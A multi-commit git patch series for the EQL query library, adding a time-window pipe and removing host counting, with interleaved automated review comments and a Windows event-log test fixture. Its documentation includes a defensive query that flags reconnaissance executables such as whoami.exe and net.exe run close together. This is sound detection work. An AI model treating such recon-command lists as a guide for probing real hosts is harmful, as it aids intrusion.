From 0bbfc10761eaf1e786cd9915d5872348c36bc6b6 Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Sat, 6 Jul 2019 13:19:06 +0100 Subject: [PATCH 01/13] Removed pipes dependency on the host_key. Pipes now reset their state after PIPE_EOF. Added new window pipe for time windowing streamed events. Fixed bug in walk__time_range reporting str instead of node. --- eql/ast.py | 22 +++++++++ eql/engines/native.py | 90 ++++++++++++++++--------------------- eql/etc/eql.ebnf | 1 + eql/parser.py | 2 +- setup.cfg | 2 +- tests/test_eql.py | 3 ++ tests/test_python_engine.py | 56 ++++++++++++++++++++++- 7 files changed, 122 insertions(+), 54 deletions(-) diff --git a/eql/ast.py b/eql/ast.py index a5f9762..af973cb 100644 --- a/eql/ast.py +++ b/eql/ast.py @@ -55,6 +55,7 @@ "CountPipe", "FilterPipe", "UniqueCountPipe", + "WindowPipe", # full queries "PipedQuery", @@ -1014,6 +1015,27 @@ class UniqueCountPipe(ByPipe): """Returns unique results but adds a count field.""" +@PipeCommand.register('window') +class WindowPipe(ByPipe): + """Maintains a time window buffer for streaming events.""" + + _timespan = None + + minimum_args = 1 + maximum_args = 1 + + @property + def timespan(self): + # cache timerange conversion + if not self._timespan: + self._timespan = TimeRange.convert(self.arguments[0]) + return self._timespan + + def validate(self): + if not self.timespan or self.timespan.delta < datetime.timedelta(0): + return 0 + + class PipedQuery(EqlNode): """List of all the pipes.""" diff --git a/eql/engines/native.py b/eql/engines/native.py index 519ba04..a78ccba 100644 --- a/eql/engines/native.py +++ b/eql/engines/native.py 
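Review bot: `WindowPipe.validate` returns `0` when the timespan is missing or negative and otherwise falls off the end returning `None`, so both outcomes are falsy and a caller inspecting the result cannot tell a valid window from an invalid one; if the framework expects `validate` to raise, raise the project's validation error here, otherwise return a bool such as `return self.timespan is not None and self.timespan.delta >= datetime.timedelta(0)`. The check also admits a zero-length window, which looks unintended given that the engine evicts with `window_buf[0][0] < minimum_start`; if `0s` should be rejected, compare with `<= datetime.timedelta(0)`. The `timespan` property caches with `if not self._timespan:`, so a falsy `TimeRange` would be re-converted on every access — test `is None` instead. A one-line docstring on `validate`, e.g. `"""Reject a missing or negative window length."""`, would document what is being enforced.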
@@ -556,30 +556,23 @@ def or_terms(scope): # type: (Scope) -> bool @pipes.add(CountPipe) def _convert_count_pipe(self, node, next_pipe): # type: (CountPipe, callable) -> callable - host_key = self.host_key if len(node.arguments) == 0: # Counting only the total summary = {'key': 'totals', 'count': 0} - hosts = set() def count_total_callback(events): if events is PIPE_EOF: - if len(hosts): - summary['total_hosts'] = len(hosts) - summary['hosts'] = list(sorted(hosts)) - next_pipe([Event(EVENT_TYPE_GENERIC, 0, summary)]) + summary['count'] = 0 next_pipe(PIPE_EOF) else: summary['count'] += 1 - if host_key in events[0].data: - hosts.add(events[0].data[host_key]) return count_total_callback else: get_key = self._convert_key(node.arguments, scoped=True, piped=True) - count_table = defaultdict(lambda: {'count': 0, 'hosts': set()}) + count_table = defaultdict(lambda: {'count': 0}) def count_tuple_callback(events): # type: (list[Event]) -> None if events is PIPE_EOF: @@ -590,21 +583,15 @@ def count_tuple_callback(events): # type: (list[Event]) -> None total = sum(tbl['count'] for tbl in count_table.values()) for key, details in sorted(converted_count_table.items(), key=lambda kv: (kv[1]['count'], kv[0])): - hosts = details.pop('hosts') - if len(hosts): - details['hosts'] = list(sorted(hosts)) - details['total_hosts'] = len(hosts) - details['key'] = key details['percent'] = float(details['count']) / total next_pipe([Event(EVENT_TYPE_GENERIC, 0, details)]) + count_table.clear() next_pipe(PIPE_EOF) else: key = get_key(events) count_table[key]['count'] += 1 - if host_key in events[0].data: - count_table[key]['hosts'].add(events[0].data[host_key]) return count_tuple_callback @@ -630,6 +617,7 @@ def _convert_head_pipe(self, node, next_pipe): # type: (HeadPipe, callable) -> def head_callback(events): if totals[0] < max_count: if events is PIPE_EOF: + totals[0] = 0 next_pipe(PIPE_EOF) else: totals[0] += 1 
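Review bot: In `count_total_callback` the PIPE_EOF branch now only zeroes `summary['count']` and forwards PIPE_EOF; the `next_pipe([Event(EVENT_TYPE_GENERIC, 0, summary)])` line was removed together with the host bookkeeping, so a bare `| count` emits no total at all in this commit. PATCH 02 of this series restores the emission, so either squash it into this change or re-add the line here so the series bisects cleanly. When re-adding it, emit a fresh dict rather than `summary` itself, because the counter is reset on the very next line while a downstream pipe may still hold the reference.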
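Review bot: The new `totals[0] = 0` in `head_callback` runs only under `if totals[0] < max_count:`, so once the cap has been reached a PIPE_EOF is handled by the remainder of the function outside this hunk, and if that path does not also zero `totals[0]` the pipe stays exhausted for the next stream — exactly the situation the "reset after PIPE_EOF" goal is meant to fix. Please confirm the other branch resets as well, or hoist the reset ahead of the cap check so it runs on every PIPE_EOF: `if events is PIPE_EOF: totals[0] = 0; next_pipe(PIPE_EOF); return`. `head_callback` continues past the end of the hunk.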
@@ -648,6 +636,7 @@ def tail_callback(events): if events is PIPE_EOF: for output in output_buffer: next_pipe(output) + output_buffer.clear() next_pipe(PIPE_EOF) else: output_buffer.append(events) @@ -670,6 +659,7 @@ def get_converted_key(buffer_events): output_buffer.sort(key=get_converted_key) for output in output_buffer: next_pipe(output) + output_buffer.clear() next_pipe(PIPE_EOF) else: output_buffer.append(events) @@ -684,6 +674,7 @@ def _convert_unique_pipe(self, node, next_pipe): # type: (UniquePipe, callable) def unique_callback(events): if events is PIPE_EOF: + seen.clear() next_pipe(PIPE_EOF) else: key = get_unique_key(events) @@ -693,11 +684,37 @@ def unique_callback(events): return unique_callback + @pipes.add(WindowPipe) + @reducers.add(WindowPipe) + def _aggregate_time_window_pipe(self, node, next_pipe): # type: (WindowPipe, callable) -> callable + """Maintains a buffer of events in a specified time window and forwards all events in the buffer.""" + + window_buf = deque() # tuple of (timestamp, events) + timespan = self.convert(node.timespan) + + def time_window_callback(events): # type: (list[Event]) -> None + if events is PIPE_EOF: + next_pipe(PIPE_EOF) + else: + minimum_start = events[0].time - timespan + + # Remove any events that no longer sit within the time window + while len(window_buf) > 0 and window_buf[0][0] < minimum_start: + window_buf.popleft() + + window_buf.append((events[0].time, events)) + + # forward the entire buffer along the pipe + for result in window_buf: + next_pipe(result[1]) + next_pipe(PIPE_EOF) + + return time_window_callback + @pipes.add(UniqueCountPipe) @reducers.add(UniqueCountPipe) def _aggregate_unique_counts(self, node, next_pipe): # type: (CountPipe) -> callable """Aggregate counts coming into the pipe.""" - host_key = self.host_key get_unique_key = self._convert_key(node.arguments, scoped=True, piped=True) results = OrderedDict() 
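Review bot: `time_window_callback` never clears `window_buf` when the real PIPE_EOF arrives, so unlike the tail, sort and unique pipes in this same commit the window carries its buffer into the next stream; add `window_buf.clear()` before `next_pipe(PIPE_EOF)` in that branch. The eviction loop inspects only `window_buf[0]` and therefore assumes timestamps arrive in non-decreasing order: an out-of-order older event is appended behind newer ones and is never evicted by the head check, so later windows can contain events older than `timespan` — either document the ordering precondition in the docstring or evict with a full scan. The `next_pipe(PIPE_EOF)` issued after every single event appears deliberate (it is what makes a downstream `unique`/`unique_count` restart per window), but it is surprising enough to deserve a comment such as `# each window is emitted as a complete mini-stream; the EOF resets downstream pipes`, and it implies any stateful pipe after `window` produces a result per input event. `_aggregate_unique_counts` continues beyond the hunk.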
@@ -707,13 +724,9 @@ def count_unique_callback(events): # type: (list[Event]) -> None total = sum(result[0].data['count'] for result in results.values()) for result in results.values(): - hosts = result[0].data.pop('hosts') # type: set - if len(hosts) > 0: - result[0].data['hosts'] = list(sorted(hosts)) - result[0].data['total_hosts'] = len(hosts) - result[0].data['percent'] = float(result[0].data['count']) / total next_pipe(result) + results.clear() next_pipe(PIPE_EOF) else: 
@@ -721,56 +734,38 @@ def count_unique_callback(events): # type: (list[Event]) -> None events = [events[0].copy()] + events[1:] piece = events[0].data key = get_unique_key(events) - hosts = piece.pop('hosts', []) - host = piece.pop(host_key, None) count = piece.pop('count', 1) if key not in results: results[key] = events match = piece - match['hosts'] = set() match['count'] = count else: match = results[key][0].data match['count'] += count - if host: - match['hosts'].add(host) - else: - match['hosts'].update(hosts) - return count_unique_callback @reducers.add(CountPipe) def _aggregate_counts(self, node, next_pipe): # type: (CountPipe) -> callable """Aggregate counts coming into the pipe.""" - host_key = self.host_key if len(node.arguments) == 0: # Counting only the total - result = {'key': 'totals', 'count': 0, 'hosts': set()} + result = {'key': 'totals', 'count': 0} def count_total_aggregates(events): # type: (list[Event]) -> None if events is PIPE_EOF: - hosts = result.pop('hosts') # type: set - if len(hosts) > 0: - result['hosts'] = list(sorted(hosts)) - result['total_hosts'] = len(hosts) - next_pipe([Event(EVENT_TYPE_GENERIC, 0, result)]) + result['count'] = 0 next_pipe(PIPE_EOF) else: piece = events[0].data result['count'] += piece['count'] - if host_key in piece: - result['hosts'].add(piece[host_key]) - elif 'hosts' in piece: - results['hosts'].update(piece['hosts']) - return count_total_aggregates else: - results = defaultdict(lambda: {'count': 0, 'hosts': set()}) + results = defaultdict(lambda: {'count': 0}) def count_tuple_callback(events): # type: (list[Event]) -> None if events is PIPE_EOF: 
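Review bot: `count_total_aggregates` has the same regression as the engine-side count pipe: on PIPE_EOF it now does `result['count'] = 0` and forwards PIPE_EOF without ever calling `next_pipe([Event(EVENT_TYPE_GENERIC, 0, ...)])`, so the reduced total is dropped. Re-add the emission with a fresh dict (since `result` is reset immediately afterwards) or squash PATCH 02 into this commit. Deleting the `results['hosts'].update(...)` lines also removes a latent NameError — `results` was never defined in that scope — which is worth a line in the commit message.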
@@ -780,23 +775,16 @@ def count_tuple_callback(events): # type: (list[Event]) -> None total = sum(result['count'] for result in converted_results.values()) for key, result in sorted(converted_results.items(), key=lambda kr: (kr[1]['count'], kr[0])): - hosts = result.pop('hosts') # type: set - if len(hosts) > 0: - result['hosts'] = list(sorted(hosts)) - result['total_hosts'] = len(hosts) result['key'] = key result['percent'] = float(result['count']) / total next_pipe([Event(EVENT_TYPE_GENERIC, 0, result)]) + results.clear() next_pipe(PIPE_EOF) else: piece = events[0].data key = events[0].data['key'] key = tuple(key) if len(node.arguments) > 1 else key results[key]['count'] += piece['count'] - if host_key in piece: - results[key]['hosts'].add(piece[host_key]) - elif 'hosts' in piece: - results[key]['hosts'].update(piece['hosts']) return count_tuple_callback diff --git a/eql/etc/eql.ebnf b/eql/etc/eql.ebnf index bee7169..bd67142 100644 --- a/eql/etc/eql.ebnf +++ b/eql/etc/eql.ebnf @@ -23,6 +23,7 @@ pipe_command::Pipe pipe_arguments = + | @+:time_unit | &(atom atom) {atom} | expressions | {} diff --git a/eql/parser.py b/eql/parser.py index 11f6e06..cf402ee 100644 --- a/eql/parser.py +++ b/eql/parser.py @@ -124,7 +124,7 @@ def walk__time_range(self, node): if name.startswith(unit.rstrip('s') or 's'): return TimeRange(datetime.timedelta(seconds=val * interval)) - raise self._error(node.unit, "Unknown time unit") + raise self._error(node, "Unknown time unit") # fields def walk__field(self, node): diff --git a/setup.cfg b/setup.cfg index cd355da..f15eac5 100644 --- a/setup.cfg +++ b/setup.cfg @@ -9,4 +9,4 @@ max-complexity = 20 ignore = D203 [tool:pytest] -addopts = --cov=eql --cov-report term-missing --cov-report=xml +#addopts = --cov=eql --cov-report term-missing --cov-report=xml diff --git a/tests/test_eql.py b/tests/test_eql.py index 62ecc15..f73bc23 100644 --- a/tests/test_eql.py +++ b/tests/test_eql.py 
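Review bot: Commenting out `addopts = --cov=eql --cov-report term-missing --cov-report=xml` in `setup.cfg` silently disables coverage collection and the XML report for every contributor and for CI, which is unrelated to the window pipe and reads like a local convenience edit that leaked into the patch. If pytest-cov was in the way locally, `pytest -p no:cov` or `--no-cov` on the command line avoids touching the shared config; if the removal is intended, state why in the commit message.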
@@ -197,6 +197,7 @@ def test_valid_queries(self): 'any where true | unique a b c | sort a b c | count', 'any where true | unique a, b, c | sort a b c | count', 'any where true | unique a, b, c | sort a,b,c | count', + 'any where true | window 5s | unique a, b | unique_count a | filter count > 5', 'file where child of [registry where true]', 'file where event of [registry where true]', 'file where event of [registry where true]', @@ -274,6 +275,8 @@ def test_invalid_queries(self): 'process where true | badPipe a b c', 'process where true | head -100', 'process where descendant of []', + 'any where true | window | unique_count a, b', + 'any where true | window a | unique_count a, b', 'file where nothing of [process where true]', 'file where DescenDant of [process where true]', 'garbage', diff --git a/tests/test_python_engine.py b/tests/test_python_engine.py index 2b5fc8b..4ba49ef 100644 --- a/tests/test_python_engine.py +++ b/tests/test_python_engine.py @@ -3,7 +3,7 @@ import uuid from collections import defaultdict -from eql.engines.base import Event, AnalyticOutput +from eql.engines.base import Event, AnalyticOutput, DEFAULT_TIME_UNIT from eql.engines.build import get_reducer, get_engine, get_post_processor from eql.engines.native import PythonEngine from eql.parser import parse_query, parse_analytic 
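Review bot: The new invalid-query cases cover `window` with no argument and with a non-time argument, but not the boundaries that `maximum_args = 1` and `WindowPipe.validate` are meant to enforce; add `'any where true | window 5s 10s | count'` to the invalid list and decide whether `window 0s` is valid, since the validator's `delta < datetime.timedelta(0)` currently lets it through. The valid case `window 5s | unique a, b | unique_count a | filter count > 5` only proves the grammar accepts the pipe, so an assertion on the parsed `WindowPipe.timespan` value would catch a silently wrong `time_unit` conversion.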
@@ -348,6 +348,60 @@ def test_special_pipes(self): sorted_results = list(sorted(results, key=lambda e: (e.data['count'], e.data['key']))) self.assertListEqual(sorted_results, results, "Count didn't output expected results") + def test_window_pipe(self): + def convert_time(seconds): + return int(float(seconds) * DEFAULT_TIME_UNIT) + + config = {'flatten': True} + events = [Event.from_data(d) for d in [ + { + "event_type": "process", + "process_name": "a", + "timestamp": convert_time(0) + }, + { + "event_type": "process", + "process_name": "b", + "timestamp": convert_time(1) + }, + { + "event_type": "process", + "process_name": "b", + "timestamp": convert_time(10.1) + }, + { + "event_type": "process", + "process_name": "c", + "timestamp": convert_time(11) + }, + { + "event_type": "process", + "process_name": "d", + "timestamp": convert_time(12) + }, + { + "event_type": "process", + "process_name": "e", + "timestamp": convert_time(13) + }, + { + "event_type": "process", + "process_name": "f", + "timestamp": convert_time(20.2) + }, + { + "event_type": "process", + "process_name": "a", + "timestamp": convert_time(31) + } + ]] + + query = 'process where true | window 10s | unique hostname, process_name | unique_count hostname | filter count > 1' + results = self.get_output(queries=[parse_query(query)], config=config, events=events) + self.assertGreater(len(results), 1, "Window pipe returned no results") + self.assertListEqual([event.data['process_name'] for event in results], ['a', 'b', 'b', 'b', 'c'], "Window didn't output expected results.") + self.assertListEqual([event.data['count'] for event in results], [2, 2, 3, 4, 4], "Window didn't output expected results.") + @staticmethod def _custom_echo(x): return x From 37ee552553113a90e2cda2c0f3db3efcb74ea917 Mon Sep 17 00:00:00 2001 
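Review bot: None of the fixture events in `test_window_pipe` carries a `hostname` field, yet the query keys both `unique` and `unique_count` on it, so the test exercises whatever the engine does for a missing field (presumably one shared key) rather than per-host windowing; either add `hostname` to the events or drop it from the query so the expected counts follow from the data. The message on `self.assertGreater(len(results), 1, ...)` says "returned no results" but the check also fails for exactly one result; use `assertGreaterEqual(len(results), 1)` or reword it. The expected lists `['a', 'b', 'b', 'b', 'c']` and `[2, 2, 3, 4, 4]` cannot be derived by a reader without a per-timestamp trace of the window contents, so a short comment listing the buffer at each event time would make a future regression diagnosable.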
From: Carl Rutherford Date: Sat, 6 Jul 2019 13:50:14 +0100 Subject: [PATCH 02/13] Fixed count pipe. Made the counter immutable. --- eql/engines/native.py | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/eql/engines/native.py b/eql/engines/native.py index a78ccba..48b8407 100644 --- a/eql/engines/native.py +++ b/eql/engines/native.py @@ -558,11 +558,13 @@ def or_terms(scope): # type: (Scope) -> bool def _convert_count_pipe(self, node, next_pipe): # type: (CountPipe, callable) -> callable if len(node.arguments) == 0: # Counting only the total - summary = {'key': 'totals', 'count': 0} + summary = {'count': 0} def count_total_callback(events): if events is PIPE_EOF: - next_pipe([Event(EVENT_TYPE_GENERIC, 0, summary)]) + # event must be immutable, as the counter will be reset + event = {'key': 'totals', 'count': summary['count']} + next_pipe([Event(EVENT_TYPE_GENERIC, 0, event)]) summary['count'] = 0 next_pipe(PIPE_EOF) else: @@ -751,11 +753,13 @@ def _aggregate_counts(self, node, next_pipe): # type: (CountPipe) -> callable """Aggregate counts coming into the pipe.""" if len(node.arguments) == 0: # Counting only the total - result = {'key': 'totals', 'count': 0} + result = {'count': 0} def count_total_aggregates(events): # type: (list[Event]) -> None if events is PIPE_EOF: - next_pipe([Event(EVENT_TYPE_GENERIC, 0, result)]) + # event must be immutable, as the counter will be reset + event = {'key': 'totals', 'count': result['count']} + next_pipe([Event(EVENT_TYPE_GENERIC, 0, event)]) result['count'] = 0 next_pipe(PIPE_EOF) else: From 95ffe5d1d36c495427ae149c08f472fc0da1ba5f Mon Sep 17 00:00:00 2001 
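Review bot: The comment `# event must be immutable, as the counter will be reset` misdescribes the fix: the emitted dict is not immutable, it is a fresh snapshot taken so that zeroing `summary['count']` (or `result['count']`) does not alter the event a downstream pipe already holds; reword to `# snapshot the counter: it is reset below and must not be shared with the emitted event`. The identical emit-and-reset sequence now lives in both `_convert_count_pipe` and `_aggregate_counts`, and the two already drifted apart once in PATCH 01, so a small `_emit_total(counter, next_pipe)` helper would keep them in lockstep.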
From: Carl Rutherford Date: Sat, 6 Jul 2019 14:40:42 +0100 Subject: [PATCH 03/13] Window buffer is emitted in reverse order to provide more interesting results. Added documentation for window pipe. --- docs/query-guide/pipes.rst | 21 +++++++++++++++++++++ eql/engines/native.py | 5 +++-- tests/test_python_engine.py | 23 +++++++++++++++++------ 3 files changed, 41 insertions(+), 8 deletions(-) diff --git a/docs/query-guide/pipes.rst b/docs/query-guide/pipes.rst index 0df657a..f02574a 100644 --- a/docs/query-guide/pipes.rst +++ b/docs/query-guide/pipes.rst @@ -124,3 +124,24 @@ Get the top five network connections that transmitted the most data | sort total_out_bytes | tail 5 +``window`` +--------- +The ``window`` pipe will buffer events based on the timespan specify, which allows other pipes to function on a sliding +window. + +Get suspicious recon commands that were executed within a 5 minute window + + .. code-block:: eql + + process where process_name in ("whoami.exe", "netstat.exe", "hostname.exe", "net.exe", "sc.exe", "systeminfo.exe") + | window 5m + | unique hostname, process_name + | unique_count process_name + | filter count >= 3 + +.. note:: + + The window buffer will emit the most recent event first, as this will provide a stream of events when using + ``unique`` pipe or ``unique_count`` pipe. However, this means when using ``filter`` pipe in the example above, + the first few events may be absent, e.g. ``filter count >= 3`` will not show the first two events in the output + results. diff --git a/eql/engines/native.py b/eql/engines/native.py index 48b8407..7cdca45 100644 --- a/eql/engines/native.py +++ b/eql/engines/native.py 
@@ -706,8 +706,9 @@ def time_window_callback(events): # type: (list[Event]) -> None window_buf.append((events[0].time, events)) - # forward the entire buffer along the pipe - for result in window_buf: + # forward the entire buffer along the pipe, reversed so that events[0] exposes new information for + # unique pipe etc + for result in reversed(window_buf): next_pipe(result[1]) next_pipe(PIPE_EOF) diff --git a/tests/test_python_engine.py b/tests/test_python_engine.py index 4ba49ef..626641e 100644 --- a/tests/test_python_engine.py +++ b/tests/test_python_engine.py @@ -372,21 +372,21 @@ def convert_time(seconds): { "event_type": "process", "process_name": "c", - "timestamp": convert_time(11) + "timestamp": convert_time(11.1) }, { "event_type": "process", - "process_name": "d", + "process_name": "c", "timestamp": convert_time(12) }, { "event_type": "process", - "process_name": "e", + "process_name": "d", "timestamp": convert_time(13) }, { "event_type": "process", - "process_name": "f", + "process_name": "e", "timestamp": convert_time(20.2) }, { 
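Review bot: Forwarding the whole buffer on every incoming event makes downstream work proportional to the number of events currently inside `timespan`, so a burst of k events within one window costs O(k²) forwards plus a PIPE_EOF per event; with a long window such as the `window 5m` in the docs example this is where a high-rate stream will stall, so at minimum state the cost in the docstring, e.g. `# O(window size) per event: every event re-emits the entire buffer`, and consider bounding the buffer length. Reversing the emission order changes what `events[0]` is for every downstream pipe, so the `unique`/`unique_count` results now depend on newest-first ordering — that belongs in the function docstring rather than only in the inline comment. The PIPE_EOF branch of `time_window_callback` lies above this hunk.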
@@ -396,11 +396,22 @@ def convert_time(seconds): } ]] + ''' + 0: [a] + 1: [a,b] + 10.1: [b] + 11.1: [b,c] + 12: [b,c,c] + 13: [b,c,c,d] + 20.2: [c,c,d,e] + 31: [a] + ''' + query = 'process where true | window 10s | unique hostname, process_name | unique_count hostname | filter count > 1' results = self.get_output(queries=[parse_query(query)], config=config, events=events) self.assertGreater(len(results), 1, "Window pipe returned no results") - self.assertListEqual([event.data['process_name'] for event in results], ['a', 'b', 'b', 'b', 'c'], "Window didn't output expected results.") - self.assertListEqual([event.data['count'] for event in results], [2, 2, 3, 4, 4], "Window didn't output expected results.") + self.assertListEqual([event.data['process_name'] for event in results], ['b', 'c', 'c', 'd', 'e'], "Window didn't output expected results.") + self.assertListEqual([event.data['count'] for event in results], [2, 2, 2, 3, 3], "Window didn't output expected results.") @staticmethod def _custom_echo(x): From dc1d525b2844ec64d32aedab3cd010740197116b Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Tue, 10 Sep 2019 14:09:40 +0100 Subject: [PATCH 04/13] Added test data --- tests/test_data.json | 159601 +++++++++++++++++++++++++++++++++++++++- 1 file changed, 159600 insertions(+), 1 deletion(-) diff --git a/tests/test_data.json b/tests/test_data.json index 0637a08..71fa9ea 100644 --- a/tests/test_data.json +++ b/tests/test_data.json 
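Review bot: The per-timestamp trace added before `query = ...` is a bare triple-quoted string expression, which is evaluated and discarded at runtime and is easily mistaken for a docstring; make it `#` comment lines. The trace also shows `10.1: [b]`, but with a 10s window the event at t=1 is still inside (`1 >= 10.1 - 10`), so the buffer there is `[b, b]`; the final counts are unaffected because `unique` collapses the pair, but the trace should match the buffer it claims to describe, and a lead-in such as `# window buffer after each event, oldest first; emitted newest first` would make the reversed emission order explicit.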
@@ -1 +1,159600 @@ -[] \ No newline at end of file +[ + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883570659490000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000050566", + "registry_value": "W32:0000000000050566", + "timestamp": 131883570659490000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000050566", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000050566\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883570659490000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883570670110000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883570670270000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883570685280000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883570685430000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883570685430000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + 
"process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883570685430000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000080582", + "registry_value": "W32:0000000000080582", + "timestamp": 131883570686060016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000080582", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000080582\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883570686060016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 1500, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "subtype": "terminate", + "timestamp": 131883570696220000, + "unique_pid": "{42FC7E13-C965-5C05-0000-001028424901}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", 
+ "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883570715590000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883570715590000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + 